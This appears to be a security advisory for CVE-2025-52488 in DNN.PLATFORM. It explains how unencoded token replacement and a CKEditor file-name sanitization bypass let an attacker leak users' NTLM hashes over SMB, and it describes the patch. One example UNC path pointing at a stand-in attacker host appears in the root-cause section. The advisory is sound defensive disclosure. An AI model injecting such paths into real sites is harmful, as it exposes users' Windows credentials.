CVE-2025-52488:
DNN.PLATFORM leaks NTLM hash via SMB Share Interaction with malicious user input
8.6
Basic Information
Technical Details
Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
---|---|---|---|
DNN.PLATFORM | nuget | >= 6.0.0, < 10.0.1 | 10.0.1 |
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The vulnerability is a high-severity information disclosure issue that allows an attacker to steal NTLM hashes from users of a vulnerable DNN.PLATFORM instance. The root cause of the vulnerability is twofold:
-
Lack of Output Encoding in Token Replacement: The primary issue lies in the token replacement system. Multiple components throughout the platform use this system to insert dynamic values into content. Before the patch, the output of these tokens was not encoded by default. This allowed an attacker to inject a UNC path (e.g.,
\\attacker.com\resource.jpg
) as the value of a token. When this token is rendered in a context that resolves URLs (like an<img>
tag'ssrc
attribute), the user's browser will attempt to authenticate with the attacker's SMB server, thereby leaking the NTLM hash of the user's Windows account. -
Improper File Name Sanitization: A second vector for this attack exists in the file upload functionality of the CKEditor provider. The file name sanitization logic could be bypassed by using specific unicode characters in the file name. These characters would be converted to path separators (
\
) after the sanitization check, allowing an attacker to create a file with a UNC path. When this file is accessed, the same NTLM hash leakage occurs.
The patch addresses these issues by:
- Introducing a new method
AddPropertySource
in the base token replacement class. This method wraps property sources in an HTML encoder by default, thus neutralizing the UNC path injection in the token replacement system. - Fixing the file name sanitization logic by performing the unicode character conversion before the cleaning, ensuring that any malicious characters are caught.
As a security engineer, you should be aware that any part of the DNN site that uses token replacement to display user-controllable data could have been a potential vector for this attack. The file upload functionality, especially in rich text editors, was another key entry point. The patch effectively mitigates these risks.
Vulnerable functions
DotNetNuke.Services.Tokens.TokenReplace.TokenReplace
DNN Platform/Library/Services/Tokens/TokenReplace.cs
DotNetNuke.Services.Tokens.HtmlTokenReplace.HtmlTokenReplace
DNN Platform/Library/Services/Tokens/HtmlTokenReplace.cs
DotNetNuke.UI.Modules.Html5.Html5ModuleTokenReplace.Html5ModuleTokenReplace
DNN Platform/Library/UI/Modules/Html5/Html5ModuleTokenReplace.cs
DNNConnect.CKE.Browser.UploadFile
DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/Browser.aspx.cs
DNNConnect.CKE.FileUploader.UploadWholeFile
DNN Platform/Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx.cs
DotNetNuke.Modules.Journal.Components.JournalItemTokenReplace.JournalItemTokenReplace
DNN Platform/Modules/Journal/Components/JournalItemTokenReplace.cs